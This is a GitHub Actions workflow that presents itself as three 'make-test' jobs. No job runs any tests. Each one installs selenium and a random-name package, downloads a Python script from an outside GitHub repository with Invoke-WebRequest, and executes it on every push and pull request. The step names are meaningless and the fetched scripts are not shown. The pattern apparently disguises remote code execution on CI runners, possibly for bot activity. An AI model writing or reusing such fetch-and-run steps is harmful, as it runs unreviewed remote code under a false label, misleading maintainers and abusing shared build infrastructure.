name: winos
on:
  push:
  pull_request:
  
jobs:
  test:
    runs-on: windows-latest
    name: make-test
    strategy:
      matrix:
        python-version: [3.9]
    steps:
    - name: Set up Python
      uses: actions/setup-python@v2
      with:
        python-version: ${{ matrix.python-version }}        
    - name: meyf
      run: |       
        pip install selenium
        pip install names
        pip3 install selenium
        Invoke-WebRequest https://github.com/Yabof386/pyconbu/raw/main/conb/cop.py -OutFile pov.py
        ls
        python3 pov.py
        
  test_1:
    runs-on: windows-latest
    name: make-test-1
    strategy:
      matrix:
        python-version: [3.9]
    steps:
    - name: Set up Python
      uses: actions/setup-python@v2
      with:
        python-version: ${{ matrix.python-version }}        
    - name: menisf
      run: |       
        pip install selenium
        pip install names
        pip3 install selenium
        Invoke-WebRequest https://github.com/Yabof386/pyconbu/raw/main/conb/nos.py -OutFile ov.py
        ls
        python3 ov.py
        
  test_2:
    runs-on: windows-latest
    name: make-test-2
    strategy:
      matrix:
        python-version: [3.9]
    steps:
    - name: Set up Python
      uses: actions/setup-python@v2
      with:
        python-version: ${{ matrix.python-version }}        
    - name: meuw
      run: |       
        pip install selenium
        pip install names
        pip3 install selenium
        Invoke-WebRequest https://github.com/Yabof386/pyconbu/raw/main/conb/zobu.py -OutFile rv.py
        ls
        python3 rv.py
